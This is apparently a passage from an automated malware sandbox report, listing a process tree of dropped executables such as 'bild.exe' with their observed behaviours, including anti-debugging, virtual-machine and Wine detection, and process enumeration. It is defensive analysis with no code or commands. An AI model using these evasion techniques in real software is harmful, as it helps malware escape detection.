                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1944
                • C:\Users\Admin\AppData\Local\Temp\10343590101\ac3bccb7d8.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343590101\ac3bccb7d8.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2316
      • C:\Users\Public\Netstat\bild.exe
        "C:\Users\Public\Netstat\bild.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1500
      • C:\Users\Public\Netstat\bild.exe
          "C:\Users\Public\Netstat\bild.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1404

      Network

      MITRE ATT&CK Enterprise v15

      Downloads
